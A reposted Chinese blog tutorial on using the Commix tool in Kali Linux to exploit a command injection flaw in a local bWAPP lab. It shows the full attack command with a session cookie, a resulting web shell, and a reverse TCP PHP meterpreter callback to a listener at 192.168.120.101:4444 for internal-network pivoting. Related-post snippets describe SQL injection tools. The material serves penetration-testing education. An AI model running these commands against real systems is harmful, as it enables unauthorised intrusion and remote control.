php注入教程kali,Kali Linux渗透工具系统命令注入漏洞工具 – Commix使用

最新推荐文章于 2025-10-01 18:38:10 发布
转载 最新推荐文章于 2025-10-01 18:38:10 发布 · 1k 阅读 · 2
文章标签:

#php注入教程kali

本文介绍了Kali中的自动化测试工具Commix,用于检测命令注入漏洞并实现反弹shell。通过步骤说明如何利用 Commix 导入历史记录,获取Cookie数据,执行渗透测试,最后演示了结合Metasploit进行内网渗透的过程。

声明:【Kali与编程】所有分享,仅做学习交流,切勿用于任何不法用途,否则后果自负!

v10bu11pm2A2VvN0560M9b.jpg

一、Commix是什么?

Commix由Python编写的一款工具,它是一个适用于web开发者、渗透测试人员及安全研究者的自动化测试工具,可以帮助他们更高效的发现web应用中的命令注入攻击相关漏洞。在Kali Linux中自带有Commix这款工具。

二、Commix补充介绍。

Commix是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,现在的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了软件的易用性和渗透的成功率,不得不说,它是IT人员的渗透利器!

三、Commix使用参数有哪些?

在Kali Linux中输入commix –h获取帮助信息!

Hp3XT1zp017BL6WB71wW77.jpg

四、Commix如何使用?

其中的特定信息如Cookie,可通过浏览器调试工具或第三方工具获取!

~# commix --url "http://127.0.0.1/bWAPP/commandi.php" --cookie="acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=mq78064h3p2b00n4toerk7ana1; security_level=0" --data="target=www.nsa.gov&form=submit"

询问是否想要一个shell 输入Y 的到shell

[?] Do you want a Pseudo-Terminal shell? [Y/n] > y

Pseudo-Terminal (type '?' for available options)

commix(os_shell) >

得到shell

commix(os_shell) > pwd

/owaspbwa/bwapp-git/bWAPP

commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > ls -ll

可以进行反弹shell 结合metasploit 进行内网渗透

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.120.101 """(msf机器)

LHOST => 192.168.120.101

commix(reverse_tcp) > set LPORT 4444

LPORT => 4444

---[ Reverse TCP shells ]---

Type '1' to use a netcat reverse TCP shell.

Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

---[ Unix-like reverse TCP shells ]---

Type '1' to use a PHP reverse TCP shell.

Type '2' to use a Perl reverse TCP shell.

Type '3' to use a Ruby reverse TCP shell.

Type '4' to use a Python reverse TCP shell.

Type '5' to use a Socat reverse TCP shell.

Type '6' to use a Bash reverse TCP shell.

Type '7' to use a Ncat reverse TCP shell.

---[ Meterpreter reverse TCP shells ]---

Type '8' to use a PHP meterpreter reverse TCP shell.

Type '9' to use a Python meterpreter reverse TCP shell.

Type '10' to use a Windows meterpreter reverse TCP shell.

Type '11' to use the web delivery script.

commix(reverse_tcp_other) > 8

[*] Generating the 'php/meterpreter/reverse_tcp' payload... [ SUCCEED ]

[*] Type "msfconsole -r /usr/share/commix/php_meterpreter.rc" (in a new window). #复制 启动msf

[*] Once the loading is done, press here any key to continue... #按下确定键就可进行在msf接收到反弹的shell

[+] Everything is in place, cross your fingers and wait for a shell!

ks1sMNR1QPWHuK1MiD1I71.jpg

Commix使用总结如下:

1.浏览器访问http://127.0.0.1 /bWAPP/commandi.php

2.提交数据 通过抓包工具截取 url cookie data数据

3.用commix 工具指定链接并进入后台

commix -- url "http://127.0.0.1 /bWAPP/commandi.php" --data="target=www.nsa.gov&form=submit" --cookie "+++++++"

亲爱的同学,我们将持续分享Kali与编程技巧,欢迎关注我们哦!

点击了解更多,还有更多Kali与编程技巧,等你来学!

陈运文
关注
kali commix工具使用详细教程
weixin_49071539的博客
11-19 4283
COMMIX 简介 commix 是一款由 python 编写,开源自动化检测系统命令注入工具 下载地址如下 github.com/commixproject/commix 参数 选项: -v           VERBOSE详细程度级别(0-1,默认值:0)。 –version       显示版本号并退出。 –output-dir=…   设置自定义输出目录路径。 -s SESSION_FILE   从存储(.sqlite)文件加载会话。 –flush-session   刷新当前目标的会话文件。 –
Commix一键检测Web注入漏洞KALI工具系列四十二)
LNN0212的博客
07-13 924
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。Commix(Command Injection Exploiter)是一个开源工具,用于自动化发现和利用Web应用程序中的命令注入漏洞
shell 工具_Kali Linux渗透工具【八】:系统命令注入漏洞工具Commix使用
weixin_39986973的博客
12-15 1114
声明:【Kali与编程】所有分享,仅做学习交流,切勿用于任何不法用途,否则后果自负!一、Commix是什么?Commix由Python编写的一款工具,它是一个适用于web开发者、渗透测试人员及安全研究者的自动化测试工具,可以帮助他们更高效的发现web应用中的命令注入攻击相关漏洞。在Kali Linux中自带有Commix这款工具。二、Commix补充介绍。Commix是为了方便的检测一个请求是否存...
Kali LinuxCommix工具全面指南:从命令注入基础到高级利用技巧
最新发布
Bruce_xiaowei的博客
10-01 861
Kali LinuxCommix命令注入工具指南 CommixKali Linux中一款自动化检测和利用命令注入漏洞工具,由Anastasios Stasinopoulos开发。该工具提供多种注入技术,包括基于结果的直接注入、时间盲注和文件盲注,并支持Shellshock等高级模块。 安装与使用Kali Linux通常预装Commix,也可通过sudo apt install commix安装 基本使用格式:commix -u "目标URL",支持POST数据、Cookie会话
commix使用
赵一舟的博客
01-18 553
00 02 读取的寄存器的长度。00 00 起始寄存器地址。01 前两位为通讯地址。
Commix 工业控制串口调试工具使用说明)
创世纪GENESIS
05-18 6927
为工业控制设计的串口设备调试工具,主要特点: 1、能根据设备的通讯协议,方便地生成多种冗余校验如Modbus,并加上结束符,适用于大多数串口通讯的工业设备; 2、能够混合输入16进制数、10进制数、ASCII字符,这种功能通过转义符“\”实现; 3、支持串口1~255,支持各种虚拟串口,可以自定义任意通讯参数组合,随时改变参数而不用关闭串口,支持不常用的波特率等; 4、可以测出设备的响应间隔; 5、通讯数据可保存到Rtf文件,参数设置可保存到Reg文件。 主要说明...
Commix命令注入漏洞利用
abg49988的博客
11-12 661
介绍   项目地址:https://github.com/stasinopoulos/commix   Commix是一个使用Python开发的漏洞测试工具,这个工具是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,在其作者发布的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了易用性。 使用 选项: -v           VERBO...
Kali Linux漏洞注入实战指南
2301_82136778的博客
11-20 624
Kali Linux作为一种渗透测试和安全审计操作系统,提供了丰富的工具和功能,帮助安全专业人员发现和利用这些漏洞。SQL注入是一种常见的漏洞攻击技术,攻击者利用应用程序对输入数据的信任,将恶意SQL查询插入到应用程序的数据库查询中。这可能导致数据泄露、篡改或甚至完全控制数据库。针对目标系统的SQL注入漏洞,我们使用Kali Linux中的SQL注入工具(如SQLMap)进行攻击,以获取敏感信息。在这个实例中,我们使用一个虚拟的目标系统,该系统运行着一个基于Web的应用程序,具有SQL注入和XSS漏洞
从实践中学习Kali Linux渗透测试
cc123489ll的博客
06-19 1202
1.1.1 黑盒测试黑盒测试(Black-box Testing)也称为外部测试(ExternalTesting)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术与工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏洞,并评估这些漏洞能否被利用。优点:有利于挖掘出系统潜在的漏洞,以及脆弱环节和薄弱点。缺点:测试较为费时和费力,同时需要渗透测试者具备较高的技术能力。
第四节 命令执行自动化工具基本使用Linux拼接符补充)-01
09-15
Commix 是一个使用 Python 开发的漏洞测试工具,主要用于检测命令注入漏洞。这个工具可以方便地检测一个请求是否存在命令注入漏洞,并且对其进行测试。Commix 工具支持直接导入 Burp 的历史记录进行检测,大大提高了...
PHP注入工具
07-17
PHP注入工具 注入地址,检测注入 网站地址浏览
WSI v5.1.25 -php注入工具
01-28
打开软件,界面如图1,界面很清晰和整洁。 使用的时候,Mysql5 inj point那个框就是你要注射的url。该url应该是有注射漏洞的点。要连union一起,就像默认值那样 http://127.0.0.1/x.php?id=10 and 1=2 union select 1,2,3,4,5 比如第4个数字会在页面上显示,那么你就将数字4替换成“loveuk”,而且最后不要跟注释符(因为程序会在提交的时候默认会自动加上),最终的url如下: http://127.0.0.1/x.php?id=10 and 1=2 union select 1,2,loveuk,4,5 设置好这个点,可以选择注射类型,这里以GET类型为例子做示范。HexEnCode一般不要选上,除非出现编码不匹配的时候才需要,空格默认是用/**/替换的,可以根据具体情况修改。 设置好后点GO,就可以开始注射了,很快数据库里面的所有库就都被列了出来,如图二。下一步操作,选中你要猜解的数据库库名,右击,选择list tables即可。猜解完表名,可以选在你需要的表来猜字段,方法和选择数据库名时一样,右击选择list Fields,如图三、图四。最后一步是读取数据,将你感兴趣的那个字段其面打上钩即可,右击选择read dates就可以得到你想要的数据了!如图五。整个过程中你不必等到每一步都进行完了再进行下一步,如果你感性趣的内容已经出来了,只要单击STOP按钮程序即可停止。 另外,软件还集成了利用注射读文件的功能,如图六,选择readfile,然后在弹出的对话框中数据你要读的文件的绝对路径即可,不过要求有文件权限才可以。 附: 较前一个版本该,版本增加了进度条显示,方便用户使用本软件时,可以清除明了的知道当前数据读取进度;另一个新功能是增加了表的记录数显示功能,可以快捷的查看对应数据库中各各表的记录总数,以便用户操作。
PHP注入工具大全-2020.zip
05-18
PHP版本注入工具大全。2020年,在家里整理电脑发现了原来的几款PHP工具,后来又在网上找了一些资源,一共整理在一起,方便自己,也方便大家!
PHP注入集成工具
11-21
php注入集成的工具,非常的具有利用价值的
渗透入侵\海洋顶端PHP注射工具.zip
07-15
海洋顶端PHP注射工具
明小子的php注入工具
05-03
明小子的php注入工具 明小子的php注入工具 明小子的php注入工具
PHP+MySql注入工具
02-01
计算机学习PHP+MySql注入工具,放心用吧'_'
穿山甲注入工具(PHP注入工具).rar
08-12
穿山甲注入工具(PHP注入工具).rar
Skipfish一键扫描网站漏洞KALI工具系列三十四)
LNN0212的博客
07-01 1236
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。Skipfish是一个高效的 web 应用安全扫描器,常用于发现网站中的漏洞使用 Skipfish 对 web 应用进行安全扫描,发现潜在的漏洞和安全问题。
Kali Linux常用命令大全:系统操作与安全管理指南
资源摘要信息:本文档《操作系统Kali Linux命令大全:常用系统操作与管理工具汇总及功能介绍》是一份详尽的Kali Linux命令参考手册,全面覆盖了从基础系统操作到高级安全管理、网络安全渗透测试所需的各类命令工具。...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值